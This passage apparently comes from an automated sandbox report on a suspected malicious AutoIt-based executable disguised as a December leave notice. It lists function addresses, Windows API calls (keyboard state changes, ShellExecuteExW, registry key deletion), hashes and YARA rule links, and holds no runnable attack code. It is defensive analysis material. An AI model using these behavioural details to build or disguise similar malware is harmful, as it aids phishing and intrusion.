                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FE8FAA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 8d5b0115cb8038040104df3d59e951949bb238dca37760e7fc16595e8995dc79
                                                      • Instruction ID: 59fa5cf7fdd16f1f1808faff68cfa32951b7cc3e3e20951e9edd1e9ea4e8d10d
                                                      • Opcode Fuzzy Hash: 8d5b0115cb8038040104df3d59e951949bb238dca37760e7fc16595e8995dc79
                                                      • Instruction Fuzzy Hash: 5131A072100254BFEB218F91CC49FEB3BADEF49765F044065FE48DA185CABA9842CB70
                                                      Function 00FD16DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                        • Part of subcall function 00F9C6F4: _wcscpy.LIBCMT ref: 00F9C717
                                                      • _wcstok.LIBCMT ref: 00FD184E
                                                      • _wcscpy.LIBCMT ref: 00FD18DD
                                                      • _memset.LIBCMT ref: 00FD1910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 34a82114d4f3a8f4a0153dbfdb9de8329241eb830c1c6a93efb098610883781d
                                                      • Instruction ID: f0e1944eac84f0dccbdfb865486c5f813fe82070c691dd675019f9c1b88c6d3a
                                                      • Opcode Fuzzy Hash: 34a82114d4f3a8f4a0153dbfdb9de8329241eb830c1c6a93efb098610883781d
                                                      • Instruction Fuzzy Hash: 39C17E316047419FC724EF64CC91A9AB7E5BF85350F04492EF8999B3A2DB34EC05EB82
                                                      Function 00FF0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • GetSystemMetrics.USER32(0000000F), ref: 00FF016D
                                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00FF038D
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FF03AB
                                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00FF03D6
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FF03FF
                                                      • ShowWindow.USER32(00000003,00000000), ref: 00FF0421
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00FF0440
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                      • String ID:
                                                      • API String ID: 3356174886-0
                                                      • Opcode ID: a225d41201758f287a48a1992b4edc2536002e5ee3b32231f4ef7adf4109b42a
                                                      • Instruction ID: 0ddebd0c2cc530465836050c01774103d3847d25261868cf83cf924e2a2a839f
                                                      • Opcode Fuzzy Hash: a225d41201758f287a48a1992b4edc2536002e5ee3b32231f4ef7adf4109b42a
                                                      • Instruction Fuzzy Hash: 7FA10135A0061AEFDB18CF68C9857BDBBB1FF08710F048115EE94A72A5DB35AD50EB90
                                                      Function 00F9AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 946df47419f9b8808538f45cb5975e4d19fa58ddc5a4daf2889c60b7e14c0033
                                                      • Instruction ID: 59dcea5166be4ba27b8122042a8100471412c92cd5ee3d0c73ddfde7cd8da48b
                                                      • Opcode Fuzzy Hash: 946df47419f9b8808538f45cb5975e4d19fa58ddc5a4daf2889c60b7e14c0033
                                                      • Instruction Fuzzy Hash: 03716CB1900109EFDF15CF98CC89ABEBB78FF85314F248149F915AA251C734AA51EFA1
                                                      Function 00FE2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FE225A
                                                      • _memset.LIBCMT ref: 00FE2323
                                                      • ShellExecuteExW.SHELL32(?), ref: 00FE2368
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                        • Part of subcall function 00F9C6F4: _wcscpy.LIBCMT ref: 00F9C717
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE242F
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FE243E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 4082843840-2766056989
                                                      • Opcode ID: 41f9614e5d110fee03496ce19e42a9755a4caebe7c399a49eb728565004fc0cc
                                                      • Instruction ID: c93a80e38f33050f474252b5247d98ea3aed1c082b05d6daa6ff155a4bbe55a8
                                                      • Opcode Fuzzy Hash: 41f9614e5d110fee03496ce19e42a9755a4caebe7c399a49eb728565004fc0cc
                                                      • Instruction Fuzzy Hash: D7719071A006199FDF15EFA5C8819AEB7F9FF48310F108059E855AB391DB38AD40EF90
                                                      Function 00FC3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00FC3DE7
                                                      • GetKeyboardState.USER32(?), ref: 00FC3DFC
                                                      • SetKeyboardState.USER32(?), ref: 00FC3E5D
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FC3E8B
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FC3EAA
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FC3EF0
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FC3F13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: be091d65a95f8c4a09636a4ef7308cfd0cb4483ce791f30e6e55d1b6dc288d14
                                                      • Instruction ID: c22ae257bf484c54892c27f8cdcae184c409af870e175d9590c99306cf689561
                                                      • Opcode Fuzzy Hash: be091d65a95f8c4a09636a4ef7308cfd0cb4483ce791f30e6e55d1b6dc288d14
                                                      • Instruction Fuzzy Hash: 4651E5A0E047D63DFB3A43648D47FB67EA55B06354F08888CE0D5568C2D3A9AEC8E760
                                                      Function 00FC3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00FC3C02
                                                      • GetKeyboardState.USER32(?), ref: 00FC3C17
                                                      • SetKeyboardState.USER32(?), ref: 00FC3C78
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FC3CA4
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FC3CC1
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FC3D05
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FC3D26
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 3d40a0992d161fcc7cf291f052f6e06486daa936aab7cd26cffbffc6fccadaf4
                                                      • Instruction ID: 600cc58e92618d1a678e9a26dca7960fb22e9009291216b83aecb355f5b36089
                                                      • Opcode Fuzzy Hash: 3d40a0992d161fcc7cf291f052f6e06486daa936aab7cd26cffbffc6fccadaf4
                                                      • Instruction Fuzzy Hash: E851D3A09047D63DFB3283648D57FBABEA96B06354F08C48CE0D6564C2D695EE84F760
                                                      Function 00FC7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: a4cd4eef292f214053b57c185da1d40a70e7192c5f751db03ac3f2da7d7c8a48
                                                      • Instruction ID: 9e63e6100cc1461c0b3179fba76060bf893fcceeb38e699fb46017d9cd91a199
                                                      • Opcode Fuzzy Hash: a4cd4eef292f214053b57c185da1d40a70e7192c5f751db03ac3f2da7d7c8a48
                                                      • Instruction Fuzzy Hash: F34153A6D1431576DF10EBF4CC86ACFB7ACAF06310F50896AE514E3121FA38D614D7A5
                                                      Function 00FE3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00FE3DA1
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FE3DCB
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00FE3E80
                                                        • Part of subcall function 00FE3D72: RegCloseKey.ADVAPI32(?), ref: 00FE3DE8
                                                        • Part of subcall function 00FE3D72: FreeLibrary.KERNEL32(?), ref: 00FE3E3A
                                                        • Part of subcall function 00FE3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00FE3E5D
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00FE3E25
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 6f9d5931dabde51929f80b100db496e9c66d22725e2e68f8127c347fdc6586ea
                                                      • Instruction ID: ba4c42f894c8a53e04839ea3ff57a0a2e12a0de3467ae2132b71658829b52aa9
                                                      • Opcode Fuzzy Hash: 6f9d5931dabde51929f80b100db496e9c66d22725e2e68f8127c347fdc6586ea
                                                      • Instruction Fuzzy Hash: D931BBB1D01149BFDB15DBD5DC8DAFFB7BCEB08350F000169A552A3140DA759F89AB60
                                                      Function 00FE8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FE8FE7
                                                      • GetWindowLongW.USER32(0185EA18,000000F0), ref: 00FE901A
                                                      • GetWindowLongW.USER32(0185EA18,000000F0), ref: 00FE904F
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FE9081
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FE90AB
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FE90BC
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FE90D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 841388718979c0486fef4482929e14ec5a77f1d61a5417ce276cb1f9dbe65c03
                                                      • Instruction ID: f7449a4cd1d643ada1bd4c2189ac2ace9bd0d8310af7d02cc80c5eb00c472d9c
                                                      • Opcode Fuzzy Hash: 841388718979c0486fef4482929e14ec5a77f1d61a5417ce276cb1f9dbe65c03
                                                      • Instruction Fuzzy Hash: 37315BB4A08254DFDB31CFA9DC84F5437A5FB49324F140164F6598B2A6CBB6A840EB60
                                                      Function 00FC08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC08F2
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC0918
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FC091B
                                                      • SysAllocString.OLEAUT32(?), ref: 00FC0939
                                                      • SysFreeString.OLEAUT32(?), ref: 00FC0942
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FC0967
                                                      • SysAllocString.OLEAUT32(?), ref: 00FC0975
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: d63be472108091c29392eec8bc3e92aceb56fa3ae8f8dc9a0c8960f08472c3a1
                                                      • Instruction ID: 4d6ecd442e2d03dc3d04e44aa093529457bba549099900d9a52fd0ff74105080
                                                      • Opcode Fuzzy Hash: d63be472108091c29392eec8bc3e92aceb56fa3ae8f8dc9a0c8960f08472c3a1
                                                      • Instruction Fuzzy Hash: FB21A67660020AAFAF109FA8CD89FBB73ECEB08370B408125F945DB255DA74EC469760
                                                      Function 00FC2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 1038674560-2734436370
                                                      • Opcode ID: bee7524ec73c130ecc982351981e0a2e863d07809692357dd3531f48a1405747
                                                      • Instruction ID: f367ee32e315e521d61b2b3e10e7d3e7608de7f483066a00e0272e7f7cfc95ed
                                                      • Opcode Fuzzy Hash: bee7524ec73c130ecc982351981e0a2e863d07809692357dd3531f48a1405747
                                                      • Instruction Fuzzy Hash: 3A21797260021267D724FA349E03FBB739CEF65320F54842DF44697046EB699942F3A0
                                                      Function 00FC0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC09CB
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FC09F1
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FC09F4
                                                      • SysAllocString.OLEAUT32 ref: 00FC0A15
                                                      • SysFreeString.OLEAUT32 ref: 00FC0A1E
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FC0A38
                                                      • SysAllocString.OLEAUT32(?), ref: 00FC0A46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: b4656c39aec6a403b0a984bcea9c7bac1519b3aaf579a1a2d19e74bb5b7c4dad
                                                      • Instruction ID: 5a511fbb5f1a0a5c45076c2059b6b1664fefec2cb248d8df9e21aa6cce1724bb
                                                      • Opcode Fuzzy Hash: b4656c39aec6a403b0a984bcea9c7bac1519b3aaf579a1a2d19e74bb5b7c4dad
                                                      • Instruction Fuzzy Hash: 4F217475600205AFDB10DFE8DD89EAA77ECEF08370B408129F949CB265DE78EC469764
                                                      Function 00FEA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                        • Part of subcall function 00F9D17C: GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                        • Part of subcall function 00F9D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FEA32D
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FEA33A
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FEA345
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FEA354
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FEA360
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: e9b34a343d21c3626b20252d13e9133ceb680767e8b8f7110eabf75a775b7635
                                                      • Instruction ID: b443ce1ba14e230e382632c0659dfdc8a506dc33964b1cd169c793dcb4fa7509
                                                      • Opcode Fuzzy Hash: e9b34a343d21c3626b20252d13e9133ceb680767e8b8f7110eabf75a775b7635
                                                      • Instruction Fuzzy Hash: 5711D0B2500219BEEF214FA1CC85EEB7F6DFF08398F014115BA08A6060C676AC21DBA4
                                                      Function 00F9CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 00F9CCF6
                                                      • GetWindowRect.USER32(?,?), ref: 00F9CD37
                                                      • ScreenToClient.USER32(?,?), ref: 00F9CD5F
                                                      • GetClientRect.USER32(?,?), ref: 00F9CE8C
                                                      • GetWindowRect.USER32(?,?), ref: 00F9CEA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: 6cd15c6fe0caf72bbbd83dee9588890f8a10a7d314d7b032ed362aefdc92d50d
